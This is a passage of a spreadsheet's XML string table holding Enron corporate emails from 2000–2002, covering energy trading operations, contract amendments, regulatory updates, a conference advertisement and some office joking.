</t>
  </si>
  <si>
    <t>Tue, 29 Aug 2000 09:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sherry.dawson@enron.com', 'laura.vargas@enron.com'})</t>
  </si>
  <si>
    <t>Mexico Origination</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Susan M Scott/HOU/ECT on 08/29/2000 04:16 _x000D_
PM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Misti Day                           08/29/2000 04:12 PM_x000D_
	_x000D_
_x000D_
To: Susan M Scott/HOU/ECT@ECT_x000D_
cc: Shiji Varkey/Corp/Enron@ENRON _x000D_
Subject: Mexico Origination_x000D_
_x000D_
_x000D_
Susan,_x000D_
Attached is a list of all originations done by Mexico for August.  I have _x000D_
highlighted the ones that have not be granted.  Please let me know if you _x000D_
have any information on these!_x000D_
_x000D_
Thanks,_x000D_
Misti_x000D_
x39525_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 30 Jul 2001 08:53:36 -0700 (PDT)</t>
  </si>
  <si>
    <t>the rock is cookin' up an ass whoopin' tonight bitch _x000D_
how he is going to whoop is a question but some ass is gettin whooped_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Kevin" &lt;klyn@pdq.net&gt;@ENRON [mailto:IMCEANOTES-+22Kevin+22+20+3Cklyn+40pdq+2Enet+3E+40ENRON@ENRON.com] _x000D_
Sent:	Monday, July 30, 2001 10:29 AM_x000D_
To:	Quigley, Dutch_x000D_
Subject:	Re:_x000D_
_x000D_
on the Rock._x000D_
_x000D_
----- Original Message -----_x000D_
From: "Quigley, Dutch" &lt;Dutch.Quigley@ENRON.com&gt;_x000D_
To: &lt;klyn@pdq.net&gt;_x000D_
Sent: Monday, July 30, 2001 10:11 AM_x000D_
_x000D_
_x000D_
can you smell it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t>
  </si>
  <si>
    <t>Wed, 1 Nov 2000 02:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">did you really send this at 8:24?_x000D_
you were early._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Gerald.Nemec@enron.com on 11/01/2000 10:08:24 AM_x000D_
_x000D_
To:   Mandy.Bowles@email.moore.com_x000D_
cc:_x000D_
Subject:  Hey_x000D_
_x000D_
_x000D_
Did you make it to work this morning?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 9 Mar 2000 09:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>New proven method</t>
  </si>
  <si>
    <t>Look a funny!_x000D_
_x000D_
&gt; A new method!_x000D_
&gt; &gt;&gt;_x000D_
&gt; &gt;&gt; HOW TO BATHE THE CAT_x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;_x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;1   Thoroughly clean the toilet._x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;_x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;2   Add the required amount of shampoo to the toilet water, and_x000D_
&gt; &gt;&gt; have_x000D_
&gt; &gt;&gt; &gt;both_x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;lids lifted._x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;_x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;3   Obtain the cat and soothe him while you carry him towards the_x000D_
&gt; &gt;&gt; &gt;bathroom._x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;_x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;4   In one smooth movement, put the cat in the toilet and close_x000D_
&gt; &gt;&gt; both_x000D_
&gt; &gt;&gt; &gt;lids_x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;(you may need to stand on the lid so that he cannot escape)._x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;_x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;CAUTION: Do not get any part of your body too close to the edge,_x000D_
&gt; as_x000D_
&gt; &gt;&gt; his_x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;paws will be reaching out for any purchase they can find._x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;_x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;5   The cat will self-agitate and make ample suds. Never mind the_x000D_
&gt; &gt;&gt; &gt;noises_x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;that come from your toilet, the cat is actually enjoying this._x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;_x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;6   Flush the toilet three or four times. This provides a "power_x000D_
&gt; &gt;&gt; wash"_x000D_
&gt; &gt;&gt; &gt;and_x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;"rinse" which I have found to be quite effective._x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;_x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;7   Have someone open the door to the outside and ensure that_x000D_
&gt; there_x000D_
&gt; &gt;&gt; are_x000D_
&gt; &gt;&gt; &gt;no_x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;people between the toilet and the outside door._x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;_x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;8   Stand behind the toilet as far as you can, and quickly lift_x000D_
&gt; &gt;&gt; both_x000D_
&gt; &gt;&gt; &gt;lids._x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;_x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;The now-clean cat will rocket out of the toilet, and run outside_x000D_
&gt; &gt;&gt; where_x000D_
&gt; &gt;&gt; &gt;he_x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;will dry himself._x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;_x000D_
&gt; &gt;&gt; &gt;&gt;   &gt;Sincerely, The Dog_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt;_x000D_
&gt;</t>
  </si>
  <si>
    <t>Wed, 8 Aug 2001 13:53:11 -0700 (PDT)</t>
  </si>
  <si>
    <t>Price Reservations 7 August 2001 Real-Time Market and 8 August 2001_x000D_
 Day-Ahead Market</t>
  </si>
  <si>
    <t>_x000D_
CGoering@nyiso.com writes to the NYISO_TECH_EXCHANGE Discussion List:_x000D_
_x000D_
The NYISO is reserving hours beginning 12:00 - 22:00 in the August 7, 2001_x000D_
Real-Time Market as well as the following hours per ECA20010608B to verify_x000D_
prices:_x000D_
_x000D_
HQ:  07:00 - 08:00, 14:00 - 18:00, and 20:00 - 22:00_x000D_
NE:  07:00 - 08:00, 12:00 - 18:00, and 20:00 - 22:00_x000D_
OH:  07:00 - 08:00 and 12:00 - 22:00_x000D_
PJM: 07:00 - 18:00 and 20:00 - 22:00_x000D_
_x000D_
In addition, the NYISO is reserving hours beginning 00:00 - 23:00 in the_x000D_
August 8, 2001 Day-Ahead Market._x000D_
_x000D_
This e-mail information is a copy of the official posting which can be_x000D_
found at the following address on our website:_x000D_
http://mis.nyiso.com/public/htm/OperMessages/CurrentOperMessages.htm#mm</t>
  </si>
  <si>
    <t>Tue, 22 May 2001 06:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jdcrowson@marathonoil.com'})</t>
  </si>
  <si>
    <t>Re: GISB amendment</t>
  </si>
  <si>
    <t>Jim,_x000D_
_x000D_
Attached is an Amendment to the Base Contract for Short-Term Sale and _x000D_
Purchase of Natural Gas (GISB) changing Section 2.5 to Enron as the _x000D_
Confirming Party.   If in agreement, please print and sign two originals and _x000D_
send same to my attention at the address below.  Upon final signature I will _x000D_
forward an original for your records._x000D_
_x000D_
Please do not hesitate to give me a call with any questions you may have _x000D_
concerning this matter._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Mon, 25 Sep 2000 02:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Get me info on this._x000D_
---------------------- Forwarded by John J Lavorato/Corp/Enron on 09/25/2000 _x000D_
09:53 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Enron Announcements                           09/22/2000 08:36 PM_x000D_
	_x000D_
_x000D_
Sent by: Enron Announcements_x000D_
To: Enron US Employees_x000D_
cc:  _x000D_
_x000D_
Subject: The New Power Company; Reserved Share Program_x000D_
_x000D_
Enron U.S Employees:_x000D_
_x000D_
A registration statement relating to a proposed initial public offering of _x000D_
shares of common stock of TNPC, Inc. (TNPC), an affiliate of Enron Corp., has _x000D_
been filed with the Securities and Exchange Commission.  In connection with _x000D_
the proposed offering, TNPC has arranged to reserve a limited number of _x000D_
shares of TNPC's common stock for purchase by Enron U.S. employees and _x000D_
certain other individuals (Reserved Share Program).  If you have any interest _x000D_
in further information regarding the Reserved Share Program, which has a _x000D_
deadline of October 2, 2000, please execute the link to the following site _x000D_
where you will find a preliminary prospectus, a letter explaining the _x000D_
program, an expression of interest form, and an NASD questionnaire related to _x000D_
the offering:_x000D_
_x000D_
http://home.enron.com:84/tnpcsharepgm/index.html_x000D_
_x000D_
NOTE:  In the event that you are unable to execute the above link, please _x000D_
copy the link to the address line of your installed browser._x000D_
_x000D_
The following statements are required to be included in this E-Mail by the _x000D_
rules and regulations of the Securities and Exchange Commission:_x000D_
_x000D_
 "A registration statement relating to the shares has been filed with the _x000D_
Securities and Exchange Commission but has not yet become effective.  These _x000D_
securities may not be sold nor may offers to buy be accepted prior to the _x000D_
time the registration statement becomes effective.  This E-Mail shall not _x000D_
constitute an offer to sell or the solicitation of an offer to buy nor shall _x000D_
there be any sales of these securities in any state in which such offer, _x000D_
solicitation or sale would be unlawful prior to registration or qualification _x000D_
under the securities laws of any such state."_x000D_
_x000D_
 "No offer to buy the securities can be accepted and no part of the purchase _x000D_
price can be received until the registration statement has become effective, _x000D_
and any such offer may be withdrawn or revoked, without obligation or _x000D_
commitment of any kind, at any time prior to notice of its acceptance given _x000D_
after the effective date.  An indication of interest in response to this _x000D_
advertisement will involve no obligation or commitment of any kind."</t>
  </si>
  <si>
    <t>Cal Prices</t>
  </si>
  <si>
    <t>Here's the path to the California prices sheet:_x000D_
_x000D_
P:Trading/California/CAScheduling/Cash/Position/CA/2001/feb2001/Cal Prices_x000D_
_x000D_
Have fun with that.</t>
  </si>
  <si>
    <t>Thu, 28 Jun 2001 08:19:55 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: RT sheets</t>
  </si>
  <si>
    <t>Are these getting sent at all anymore?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Couch, Brooklyn  _x000D_
Sent:	Thursday, June 28, 2001 8:19 AM_x000D_
To:	Symes, Kate_x000D_
Subject:	RT sheets_x000D_
_x000D_
Kate,_x000D_
_x000D_
Please forward the rt sheets for 6/26 and 6/27 to Ainsley and EES Power Settlements._x000D_
_x000D_
Thanks_x000D_
Brooklyn</t>
  </si>
  <si>
    <t>Wed, 26 Dec 2001 22:57:34 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'punit.rawal@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'l..garcia@enron.com', 'don.baughman@enron.com', 'punit.rawal@enron.com', 'joe.errigo@enron.com', 'carrie.larkworthy@enron.com', 'dean.laurent@enron.com', 'michael.seely@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Hey Deskmates,_x000D_
_x000D_
Before I toodle off to Denver and my bones grace a few ski slopes I figured I would tell you guys what Eric Serio told me when I was doing the first MDEA nightly checkout thingie. _x000D_
_x000D_
I was given to understand that the whole idea behind these EES nitely checkouts for MDEA was that the Services application as well as OATI/scheduling/Daily checkout to agree. However after a couple of conversations with Mike we both reached the inescapable conclusion that not all of us are on the same page as far as MDEA checkouts go. This I hope will help rid of that problem._x000D_
_x000D_
My understanding is as follows: _x000D_
1. OATI's 'Actual MW' and Services 'Actual Net Tie' have to agree. _x000D_
2. OATI's 'Inadvertent' row under daily checkout and Services' "Imbalance' especially have to agree._x000D_
3. The above 2 would automatically agree if OATI is functioning properly and picks up MW numbers from the tags (which however has not been the case in the past 4 days)_x000D_
4. Once the MDEA fax arrives and is synchronized with Services, hit "Edit Actual-MW values" in OATI : Daily checkout under shceduling. Put in the same values as the MDEA fax (system load) and the synchronized Services' " Actual Net Tie" (which should by now agree with System Load of the MDEA fax). _x000D_
5. Hit "Apply". Now OATI and Services should agree on "Actual-MW values" and "Actual Net Tie". They should also agree on "Inadvertent" and "Imbalance" respectively. (If not, Eric told me there was a procedure by where one could build a dummy tag just to make OATI agree (apparently they have had this problem before , since they have a solution for it) but assured me that we would not need to worry about that)._x000D_
6. After this go through the normal procedure explained in the night desk duties email. _x000D_
_x000D_
This is only my understanding of it and might be completely flawed. However I think there might be some merit to it since we fax over the Net Tie report and the printouts of our OATI(scheduled and next day) to EES. The reason being that they can check on their OATI and see if they agree or not. (I also assume that they do not have a similar Services application as ours since that would obviate the need for OATI checkouts). Which, again is why it is so imperative that our Services and OATI agree. _x000D_
_x000D_
Lastly, in case I am horribly wrong on the above and someone decides to take it up to instruct me for the better, I shall be available at 303-693-1965 for the remainder of my holiday and on 720-320-4270 for 24/7._x000D_
_x000D_
Happy New Year to all of you and your families. May the new year bring more certainty and better fortune for all of us._x000D_
_x000D_
Adios, for now,_x000D_
_x000D_
Punit._x000D_
</t>
  </si>
  <si>
    <t>Wed, 3 Jan 2001 10:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>38th floor issues</t>
  </si>
  <si>
    <t xml:space="preserve">Just so you can see what is happening....._x000D_
----- Forwarded by Mark Taylor/HOU/ECT on 01/03/2001 06:04 PM -----_x000D_
_x000D_
	Joya Williams_x000D_
	01/03/2001 04:04 PM_x000D_
		 _x000D_
		 To: Dolores Sustaita/EPSC/HOU/ECT@ECT, Frank Ortiz/EPSC/HOU/ECT@ECT_x000D_
		 cc: Mark Taylor/HOU/ECT@ECT_x000D_
		 Subject: 38th floor issues_x000D_
_x000D_
Hi Dolores/Frank:_x000D_
_x000D_
(1) Did you check on removing the TV from EB3866?  If there's a huge cost for _x000D_
relocating the TV, please let me know. Also, what is the cost for_x000D_
 removing the TV?_x000D_
 Charge CO/RC = 0413/105658_x000D_
_x000D_
(2) We need to have the secretarial cube at EB3875 lowered to 42".  I guess _x000D_
this is a request for construction????_x000D_
 Charge CO/RC = 0413/105659_x000D_
_x000D_
(3) The copier has been delivered by my desk at EB3855A from 3AC.  Can we get _x000D_
a status on the engineers getting the plug ready?_x000D_
 ( you know what I mean)._x000D_
_x000D_
(4) We also need to get a drawing for reconstructing the area between my desk _x000D_
at EB3855A and EB3858/EB3858A/EB3858C/EB3858B.  We need to   maximize this _x000D_
space and add to secretarial workstations and maybe some type of closure to _x000D_
block the sound of the copier._x000D_
_x000D_
(5) We need to relocate the library currently at EB3858C to the team room at _x000D_
EB3872._x000D_
_x000D_
(6) Can I please get a current copy of the floor plan._x000D_
_x000D_
(7) The Cost Memo has been signed for the final phase of construction by Mark _x000D_
Haedicke.  Can I get the estimated date for construction to begin?_x000D_
  I need to put in a churn request as soon as possible._x000D_
_x000D_
Today, Raul w/ McCoy came by and we did a walk through for the offices that _x000D_
were just completed.  _x000D_
_x000D_
_x000D_
Thanks._x000D_
_x000D_
_x000D_
Joya' F. Williams, Sr. Admin. Assistant_x000D_
EGM Legal Department_x000D_
1400 Smith St., EB3855A_x000D_
Houston, Texas  77002_x000D_
joya.williams@enron.com_x000D_
(713) 853-9559 (direct dial)_x000D_
(713) 646-4842 (fax)_x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 17:33:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'matt.smith@enron.com', 'keith.holst@enron.com', 'donna.fulton@enron.com', 'frank.ermis@enron.com', 'k..allen@enron.com', 'don.black@enron.com', 'paul.kaufman@enron.com', 'tori.kuykendall@enron.com', 'susan.mara@enron.com', 'leslie.lawner@enron.com', 'l..nicolay@enron.com', 'robert.superty@enron.com', 'mike.grigsby@enron.com', 'mark.courtney@enron.com', 'suzanne.calcagno@enron.com', 'barry.tycholiz@enron.com', 'l..gay@enron.com', 'p..hewitt@enron.com', 'ed.mcmichael@enron.com', 'jeff.dasovich@enron.com', 'm..tholt@enron.com', 'patti.sullivan@enron.com', 'stephanie.miller@enron.com'})</t>
  </si>
  <si>
    <t>RE: Comments of the Other Parties on El Paso System Reallocation,_x000D_
 RP00-336</t>
  </si>
  <si>
    <t xml:space="preserve">The attachment summarizes all of the comments filed by other parties in this proceeding.  They're now in alphabetical order by the party filing, and the ones that I added since last night are highlighted.  Let me know if you'd like a copy of any of them._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 26 Jun 2001 10:56:44 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: thanks</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	weidong tian &lt;wdtian_2000@yahoo.com&gt;@ENRON [mailto:IMCEANOTES-weidong+20tian+20+3Cwdtian+5F2000+40yahoo+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Friday, June 01, 2001 1:33 AM_x000D_
To:	Kaminski, Vince J_x000D_
Subject:	thanks_x000D_
_x000D_
Dear Mr.Vince Kaminski,_x000D_
_x000D_
It was very nice to see you in my interview. Thank you_x000D_
very much for your time and questions. Through my_x000D_
interview process, I got to know Enron better and saw_x000D_
many excited things. I think my experience and skill_x000D_
would be a good fit for Enron and be able to make_x000D_
contribution with all my exposures. Thanks again for_x000D_
your attention._x000D_
_x000D_
_x000D_
Best wishes_x000D_
_x000D_
Weidong Tian_x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Get personalized email addresses from Yahoo! Mail - only $35_x000D_
a year!  http://personal.mail.yahoo.com/</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 08:10:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'j..farmer@enron.com', 'f..smith@enron.com'})</t>
  </si>
  <si>
    <t>FW: Deal 819348</t>
  </si>
  <si>
    <t>_x000D_
fyi_x000D_
 -----Original Message-----_x000D_
From: 	Balfour-Flanagan, Cyndie  _x000D_
Sent:	Thursday, June 07, 2001 10:08 AM_x000D_
To:	Richardson, Stacey; Anderson, Bridgette; Campos, Anthony; Gonzales, Sharon_x000D_
Cc:	Lamadrid, Victor; Hernandez, Elizabeth L.; Deming, Richard; Osire, Ann; Wallumrod, Ellen_x000D_
Subject:	RE: Deal 819348_x000D_
_x000D_
I'm assuming that since this deal is on the new Texas Desk, and that no new deals have been negotiated under CES counterparties that this deal is actually a truncated deal that was split to move open production from ENA - IM Texas (which I believe no longer exists as part of the post-HPL/AEP processes) to ENA - IM Lonestar. The deals have been split several times &amp; when this occurs, as they are all part of the original contract #. Basically (assuming that this was the case) it becomes a "1 of 3" scenario. The deals are kept on the same contract number to help track the continuity of the pieces. Although changing to a new contract will not skew anything, it is generally best to try to keep them all together. (Unless the deal was split for a contract or counterparty issue). Desk splits just basically move the deal to a new book. Since the move was already made, I'm just going to let it stand unless anyone have any objections._x000D_
_x000D_
Also, since this is a CES deal there is not a need to reconfirm as none of the CES deals (those still carrying the CES prefix) were to be confirmed by ENA._x000D_
Thanks all!_x000D_
Cyndie_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Richardson, Stacey  _x000D_
Sent:	Wednesday, June 06, 2001 5:24 PM_x000D_
To:	Balfour-Flanagan, Cyndie; Anderson, Bridgette; Campos, Anthony; Gonzales, Sharon_x000D_
Cc:	Lamadrid, Victor; Hernandez, Elizabeth L.; Deming, Richard; Osire, Ann; Wallumrod, Ellen_x000D_
Subject:	Deal 819348_x000D_
_x000D_
I was researching deal 819348 (CES - MidCon Texas Gas Services Corp) and found that it was incorrectly attached to contract 96035432 (in fact, the GTC Firm had THREE deals attached).  Since one of the deals ended 03/31/01, we won't bother correcting that one, but this deal needs to be moved.  I set up contract 96061912 and attached it today.  THIS DEAL STILL NEEDS TO BE REVIEWED BY CYNDIE BEFORE THE CP IS INACTIVATED._x000D_
_x000D_
Elizabeth, could you please revalidate this deal?_x000D_
_x000D_
My team, could you please add this one to your daily deal count report?_x000D_
_x000D_
Ellen, could you please reconfirm if necessary?_x000D_
_x000D_
Thanks, all.  Please let me know if you have any questions._x000D_
_x000D_
SBR x30569</t>
  </si>
  <si>
    <t>Mon, 7 Jan 2002 19:47:34 -0800 (PST)</t>
  </si>
  <si>
    <t>Last Week to Receive Early Bird Discount for Electricity Risk_x000D_
 Management Workshop and Conference</t>
  </si>
  <si>
    <t xml:space="preserve">Electricity Risk Management 101 Workshop _x000D_
_x000D_
And_x000D_
_x000D_
Portfolio Optimization for Electric Utilities Conference_x000D_
_x000D_
January 22-25, 2002, New York City, NY_x000D_
_x000D_
 _x000D_
_x000D_
OVERVIEW_x000D_
_x000D_
 _x000D_
_x000D_
In the current environment of volatile energy prices and deregulation, it has become increasingly more important for the electricity industry to learn how to manage price risk. EUCI presents two events formatted for the beginner to the expert in price risk management. The first Workshop is designed for the beginner with no prior experience in risk management and introduces the basic vocabulary and concepts in a concise and easily understandable format which forms the foundation for the more advanced concepts applied in the second event (Conference)._x000D_
_x000D_
 _x000D_
_x000D_
The brochure for the Electricity Risk Management 101 Workshop and the Portfolio Optimization for Electric Utilities Conference can be obtained by clicking on the link below:_x000D_
_x000D_
http://www.euci.com/pdf/risk_mgmt.pdf_x000D_
_x000D_
 _x000D_
_x000D_
Transmission Expansion and Systems in Transition Conference_x000D_
_x000D_
Feb. 5-8, 2002, Miami, Florida_x000D_
_x000D_
 _x000D_
_x000D_
OVERVIEW_x000D_
_x000D_
 _x000D_
_x000D_
This conference will examine the business and regulatory challenges to U.S. electric systems in transition in effectively expanding transmission capacity to meet new demands in the larger and more competitive regional markets emerging under FERC's RTO initiatives.  The conference will review the parameters of these challenges and possible solutions to them.  It will examine technology options and new business models for transmission expansion.  It will analyze emerging proposals for effective transmission planning and pricing, including market-based pricing alternatives to FERC's traditional pricing methods. The conference will also discuss what it will take in legislative action and regulatory initiative to achieve an efficient regime for ensuring that the nation has a reliable grid and regional trading system._x000D_
_x000D_
 _x000D_
_x000D_
The brochure for the Conference and associated Workshops can be obtained by clicking on the link below:_x000D_
_x000D_
http://www.euci.com/pdf/trans_expn.pdf_x000D_
_x000D_
 _x000D_
_x000D_
Electricity Market Design Conference_x000D_
_x000D_
March 25-26, 2002, Atlanta, Georgia_x000D_
_x000D_
 _x000D_
_x000D_
OVERVIEW_x000D_
_x000D_
 _x000D_
_x000D_
This Conference will focus on how to design competitive electricity markets that maximize the benefits to consumers while at the same time maintaining the financial viability of companies participating in these markets._x000D_
_x000D_
 _x000D_
_x000D_
The brochure for the Electricity Market Design Conference, March 25-26, 2002, Wyndham Hotel Downtown, Atlanta, GA can be obtained by clicking on the link below:_x000D_
_x000D_
 _x000D_
_x000D_
http://www.euci.com/pdf/mktdesign.pdf_x000D_
_x000D_
 _x000D_
_x000D_
Power Generation Asset and Portfolio Management Conference_x000D_
_x000D_
March 26-28 2002, Atlanta, Georgia_x000D_
_x000D_
 _x000D_
_x000D_
OVERVIEW_x000D_
_x000D_
 _x000D_
_x000D_
This conference will highlight the commonalties and common applications between the asset management processes used throughout the enterprise.  The conference will emphasize the need to link the physical power generation asset management processes to the activities and processes of the trading and marketing process.  The processes of Asset management will be addressed from three distinct perspectives, first, the long-term perspective of portfolio developers, second the more medium term perspective of maintenance/system planners and third the conference will link short term issues of the trading &amp; marketing departments. The purpose is to show how these processes can be integrated to the individual assets (plants) in order to provide consistent and profitable strategies for the generation asset owner._x000D_
_x000D_
 _x000D_
_x000D_
The brochure for the Power Generation Asset and Portfolio Management Conference, March 26-28, 2002, Wyndham Hotel Downtown, Atlanta, GA can be obtained by clicking on the link below:_x000D_
_x000D_
 _x000D_
_x000D_
http://www.euci.com/pdf/assetmgmt.pdf_x000D_
_x000D_
 _x000D_
_x000D_
Please print the brochure and fax the registration form back to us at 303-741-0849 if you would like to attend any of these events. You can also register by calling us at 303-770-8800 or online. _x000D_
_x000D_
 _x000D_
_x000D_
We have updated our website to include new conference proceedings on recently-held "Electric Power Market Performance", "Performance-Based Ratemaking", "Ancillary Services", "Performance Management for Electric Distribution Companies", "Power Generation Asset Management", and "Power T&amp;D Asset Management" conferences. Please visit www.euci.com and review the conference proceedings section for these and other proceedings._x000D_
_x000D_
 _x000D_
_x000D_
Kindly forward this announcement to your colleagues who might benefit from attending these events._x000D_
_x000D_
 _x000D_
_x000D_
Best Regards,_x000D_
_x000D_
_x000D_
_x000D_
L. Mrig_x000D_
_x000D_
Electric Utility Consultants, Inc. (EUCI)_x000D_
_x000D_
5555 Preserve Drive_x000D_
_x000D_
Greenwood Village CO 80121_x000D_
_x000D_
Tel: 303-770-8800_x000D_
_x000D_
Fax: 303-741-0849_x000D_
_x000D_
lmrig@euci.com_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Wed, 14 Feb 2001 02:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Potential Process for CPUC Action on Direct Access</t>
  </si>
  <si>
    <t xml:space="preserve"> I talked to our CPUC attorney, Jeanne Bennett._x000D_
_x000D_
There is a CPUC tomorrow at which a vote could be taken_x000D_
It is not on the agenda now, but that doesn't stop a vote_x000D_
The CPUC could decide by majority vote to take up the issue at the meeting _x000D_
and then vote to enact the ban on direct access -- all without any notice to _x000D_
the public_x000D_
We will have a representative at the meeting._x000D_
Jeff is contacting coalition members to work the legislative angle._x000D_
There is another CPUC meeting on 2/22_x000D_
_x000D_
Sue Mara_x000D_
Enron Corp._x000D_
Tel: (415) 782-7802_x000D_
Fax:(415) 782-7854</t>
  </si>
  <si>
    <t>Wed, 1 Aug 2001 14:40:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jchen@brobeck.com'})</t>
  </si>
  <si>
    <t>frozenset({'c..williams@enron.com', 'b..sanders@enron.com', 'martin.smith@enron.com'})</t>
  </si>
  <si>
    <t>Remand Order</t>
  </si>
  <si>
    <t xml:space="preserve">FYI._x000D_
_x000D_
Thank you._x000D_
Jane_x000D_
_x000D_
Jane Chen_x000D_
Brobeck, Phleger &amp; Harrison, LLP_x000D_
Assistant to Gary Fergus &amp; Kirstin Wolf_x000D_
SF ext. 2944_x000D_
SF rm. 2917c_x000D_
DD (415) 979-2944_x000D_
 &lt;&lt;Order GRANT P's Mtn Remand.07.31.01.pdf&gt;&gt;_x000D_
_x000D_
=======================================================_x000D_
This email message is for the sole use of the intended recipient(s) and may contain confidential and privileged information. Any unauthorized review, use, disclosure or distribution is prohibited. If you are not the intended recipient, please contact the sender by reply email and destroy all copies of the original message._x000D_
_x000D_
To reply to our email administrator directly, send an email to postmaster@brobeck.com_x000D_
BROBECK PHLEGER &amp; HARRISON LLP_x000D_
http://www.brobeck.com_x000D_
_x000D_
_x000D_
_x000D_
 - Order GRANT P's Mtn Remand.07.31.01.pdf </t>
  </si>
  <si>
    <t>Thu, 25 Jan 2001 09:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'frank.sayre@enron.com', 'francisco.leite@enron.com', 'anne.koehler@enron.com', 'tana.jones@enron.com', 'carol.clair@enron.com', 'susan.bailey@enron.com', 'brent.hendry@enron.com', 'robert.bruce@enron.com', 'samantha.boyd@enron.com', 'cheryl.nelson@enron.com', 'mary.cook@enron.com', 'mark.taylor@enron.com', 'stephanie.panus@enron.com'})</t>
  </si>
  <si>
    <t>check out procedure for swap group files</t>
  </si>
  <si>
    <t>In an effort to avoid loss of our executed agreements/files (master _x000D_
agreements, brokerage and futures agreements, repo agreements), we are _x000D_
testing out the  "library approach" and instituting a checkout procedure.  _x000D_
Whenever you remove one of these files from the file cabinet, please "hold _x000D_
the file location" with a signed "card" (legal sized) available on top of the _x000D_
master agreement file cabinet.  You will also see a large sign reminding you _x000D_
to sign out for your file.  When the file is returned, just replace the _x000D_
"card" with the file and delete your name from the "card".  _x000D_
_x000D_
Please be sure to check out all files currently in your office._x000D_
_x000D_
Thanks for your cooperation._x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com</t>
  </si>
  <si>
    <t>Mon, 24 Sep 2001 08:56:35 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rick.dietz@enron.com', 'lynn.blair@enron.com', 'lorraine.lindberg@enron.com', 'kimberly.watson@enron.com', 'elizabeth.brown@enron.com'})</t>
  </si>
  <si>
    <t>_x000D_
FYI._x000D_
 -----Original Message-----_x000D_
From: 	Brown, Elizabeth  _x000D_
Sent:	Saturday, September 22, 2001 10:58 PM_x000D_
To:	Watson, Kimberly; Blair, Lynn; Dietz, Rick; Donoho, Lindy_x000D_
Subject:	K #27291 - Invoices not capturing incremental fees for alternate points_x000D_
_x000D_
FYI - In working to load rates for the FERC California reporting requirements, it appears that for the last four months Duke Energy T &amp; M contract #27291 has not been billed the incremental fee of $0.06/dth for alternate deliveries to the Cal Border (over and above the base discount negotiated for the contracted primary points)._x000D_
_x000D_
Please let me know if you have any questions._x000D_
_x000D_
_x000D_
Thanks,_x000D_
Elizabeth_x000D_
x3-6928</t>
  </si>
  <si>
    <t>Thu, 20 Jan 2000 00:49:00 -0800 (PST)</t>
  </si>
  <si>
